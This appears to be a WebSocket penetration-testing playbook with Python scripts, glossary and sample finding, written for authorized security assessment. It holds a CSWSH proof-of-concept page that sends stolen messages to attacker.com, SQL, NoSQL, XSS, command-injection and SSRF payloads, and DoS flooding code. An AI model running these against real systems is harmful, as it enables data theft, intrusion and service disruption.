Tests WebSocket API implementations for security vulnerabilities including missing authentication on WebSocket upgrade, Cross-Site WebSocket Hijacking (CSWSH), injection attacks through WebSocket messages, insufficient input validation, denial-of-service via message flooding, and information leakage through WebSocket frames. The tester intercepts WebSocket handshakes and messages using Burp Suite, crafts malicious payloads, and tests for authorization bypass on WebSocket channels. Activates for requests involving WebSocket security testing, WS penetration testing, CSWSH attack, or real-time API security assessment.
Do not use without written authorization. WebSocket testing may disrupt real-time services and affect other connected users.
websockets and asyncio librariesnpm install -g wscatimport asyncio
import websockets
import json
import ssl
import time
WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"
# Capture and analyze the WebSocket handshake
async def analyze_handshake():
"""Analyze WebSocket upgrade request and response headers."""
try:
async with websockets.connect(
WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
ssl=ssl.create_default_context()
) as ws:
print(f"Connected to: {WS_URL}")
print(f"Protocol: {ws.subprotocol}")
print(f"Extensions: {ws.extensions}")
# Send a test message
test_msg = json.dumps({"type": "ping"})
await ws.send(test_msg)
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"Server response: {response}")
return True
except websockets.exceptions.InvalidStatusCode as e:
print(f"Connection rejected: {e.status_code}")
return False
except Exception as e:
print(f"Connection error: {e}")
return False
asyncio.run(analyze_handshake())
async def test_ws_authentication():
"""Test if WebSocket requires authentication."""
results = []
# Test 1: Connect without any authentication
try:
async with websockets.connect(WS_URL) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "No authentication",
"status": "VULNERABLE",
"response": resp[:200]
})
print(f"[VULN] WebSocket accessible without authentication")
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "No authentication", "status": "SECURE"})
except Exception as e:
results.append({"test": "No authentication", "status": f"ERROR: {e}"})
# Test 2: Connect with invalid token
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Invalid token",
"status": "VULNERABLE",
"response": resp[:200]
})
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "Invalid token", "status": "SECURE"})
except Exception as e:
results.append({"test": "Invalid token", "status": f"ERROR: {e}"})
# Test 3: Connect with expired token
expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": expired_token}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({"test": "Expired token", "status": "VULNERABLE"})
except (websockets.exceptions.InvalidStatusCode, Exception):
results.append({"test": "Expired token", "status": "SECURE"})
# Test 4: Token in query parameter (leakage risk)
try:
async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
await ws.send(json.dumps({"type": "ping"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Token in URL",
"status": "INFO - Token accepted in query parameter (may leak in logs)"
})
except Exception:
results.append({"test": "Token in URL", "status": "REJECTED"})
for r in results:
print(f" [{r['status'][:10]}] {r['test']}")
return results
asyncio.run(test_ws_authentication())
async def test_cswsh():
"""Test for Cross-Site WebSocket Hijacking vulnerability."""
# CSWSH occurs when the WebSocket server does not validate the Origin header
# An attacker's website can connect to the legitimate WebSocket and steal data
origins_to_test = [
None, # No Origin header
"https://evil.com", # Attacker domain
"https://target-api.example.com.evil.com", # Subdomain confusion
"null", # Null origin (sandboxed iframe)
"https://target-api.example.com", # Legitimate origin
"http://target-api.example.com", # HTTP downgrade
]
print("=== CSWSH Testing ===\n")
for origin in origins_to_test:
try:
headers = {"Authorization": AUTH_TOKEN}
if origin:
headers["Origin"] = origin
async with websockets.connect(WS_URL, extra_headers=headers) as ws:
# Try to receive data that should be restricted
await ws.send(json.dumps({"type": "get_messages"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
if origin and origin != "https://target-api.example.com":
print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
else:
print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
except websockets.exceptions.InvalidStatusCode as e:
print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
except Exception as e:
print(f"[ERROR] Origin '{origin}' -> {e}")
asyncio.run(test_cswsh())
# PoC HTML page for CSWSH exploitation
CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// This page, hosted on attacker.com, connects to the target WebSocket
// If the server doesn't validate Origin, the victim's browser will
// send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() {
console.log("Connected to target WebSocket");
ws.send(JSON.stringify({type: "get_messages"}));
ws.send(JSON.stringify({type: "get_user_data"}));
};
ws.onmessage = function(event) {
console.log("Stolen data:", event.data);
// Exfiltrate to attacker server
fetch("https://attacker.com/collect", {
method: "POST",
body: event.data
});
};
</script>
<p>Loading... (CSWSH attack in progress)</p>
</body>
</html>
"""
async def test_ws_injection():
"""Test WebSocket messages for injection vulnerabilities."""
INJECTION_PAYLOADS = {
"sql": [
{"type": "search", "query": "' OR '1'='1"},
{"type": "search", "query": "'; DROP TABLE messages;--"},
{"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
],
"nosql": [
{"type": "search", "query": {"$ne": ""}},
{"type": "get_user", "filter": {"$gt": ""}},
],
"xss": [
{"type": "send_message", "content": "<script>alert('xss')</script>"},
{"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
{"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
],
"command": [
{"type": "process", "file": "test; cat /etc/passwd"},
{"type": "convert", "input": "test | id"},
],
"ssrf": [
{"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
{"type": "webhook", "callback": "http://localhost:6379/"},
],
"overflow": [
{"type": "send_message", "content": "A" * 100000},
{"type": "search", "query": "B" * 1000000},
],
}
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
for category, payloads in INJECTION_PAYLOADS.items():
for payload in payloads:
try:
await ws.send(json.dumps(payload))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
# Analyze response for injection indicators
resp_lower = resp.lower()
indicators = []
if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
indicators.append("SQL error")
if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
indicators.append("Command output")
if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
indicators.append("SSRF data")
if "script" in resp_lower and "xss" not in category:
indicators.append("Reflected XSS")
if indicators:
print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
elif len(resp) > 10000:
print(f"[OVERFLOW] Large response: {len(resp)} bytes")
except asyncio.TimeoutError:
pass
except websockets.exceptions.ConnectionClosed:
print(f"[CRASH] Connection closed after {category} payload")
# Reconnect
break
asyncio.run(test_ws_injection())
async def test_ws_dos():
"""Test WebSocket for DoS vulnerabilities."""
print("=== WebSocket DoS Testing ===\n")
# Test 1: Message flooding
async def flood_test():
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
count = 0
start = time.time()
for i in range(10000):
try:
await ws.send(json.dumps({"type": "ping", "id": i}))
count += 1
except websockets.exceptions.ConnectionClosed:
break
elapsed = time.time() - start
print(f" Flood test: {count} messages in {elapsed:.1f}s ({count/elapsed:.0f} msg/s)")
await flood_test()
# Test 2: Large message
async def large_message_test():
sizes = [1024, 10240, 102400, 1024000, 10240000] # 1KB to 10MB
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
max_size=20*1024*1024) as ws:
for size in sizes:
try:
large_msg = json.dumps({"type": "data", "payload": "A" * size})
await ws.send(large_msg)
resp = await asyncio.wait_for(ws.recv(), timeout=5)
print(f" Large message ({size} bytes): Accepted")
except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
print(f" Large message ({size} bytes): Rejected/Disconnected")
break
await large_message_test()
# Test 3: Connection exhaustion
async def connection_exhaustion():
connections = []
for i in range(100):
try:
ws = await websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN})
connections.append(ws)
except Exception:
break
print(f" Connection exhaustion: {len(connections)} concurrent connections established")
for ws in connections:
await ws.close()
await connection_exhaustion()
asyncio.run(test_ws_dos())
| Term | Definition |
|---|---|
| WebSocket | Full-duplex communication protocol over a single TCP connection, established via HTTP upgrade handshake |
| CSWSH | Cross-Site WebSocket Hijacking - an attack where a malicious website initiates a WebSocket connection to a legitimate server using the victim's browser credentials |
| Origin Validation | Server-side check of the Origin header during WebSocket handshake to prevent CSWSH by rejecting connections from unauthorized domains |
| WebSocket Frame | The basic unit of data in WebSocket communication, containing opcode, masking, payload length, and payload data |
| Upgrade Handshake | HTTP request with Upgrade: websocket and Connection: Upgrade headers that establishes the WebSocket connection |
| Message Flooding | Sending a large volume of WebSocket messages to exhaust server resources (memory, CPU, bandwidth) |
wscat -c wss://target.com/ws -H "Authorization: Bearer token"Context: A messaging application uses WebSocket for real-time chat. The WebSocket endpoint handles message delivery, typing indicators, read receipts, and user presence. Authentication is cookie-based.
Approach:
wss://chat.example.com/ws with session cookie authenticationPitfalls:
## Finding: Cross-Site WebSocket Hijacking Enables Real-Time Data Theft
**ID**: API-WS-001
**Severity**: High (CVSS 8.1)
**Affected Endpoint**: wss://chat.example.com/ws
**Description**:
The WebSocket server does not validate the Origin header during the
handshake. An attacker can host a malicious web page that opens a
WebSocket connection to the chat server using the victim's session
cookie. All messages, typing indicators, and presence data are
forwarded to the attacker in real time.
**Proof of Concept**:
Host the CSWSH PoC page on attacker.com. When a logged-in user
visits the page, the JavaScript establishes a WebSocket connection
to the chat server. The server authenticates the connection using
the victim's cookie and delivers all real-time chat data to the
attacker's connection.
**Impact**:
Real-time interception of all private messages, presence data,
and typing indicators for any user who visits the attacker's page.
**Remediation**:
1. Validate the Origin header against an allowlist of legitimate domains
2. Implement CSRF tokens in the WebSocket handshake URL
3. Use token-based authentication (Authorization header) instead of cookies for WebSocket
4. Implement per-message authorization checks, not just connection-level authentication
5. Add rate limiting on WebSocket message volume per connection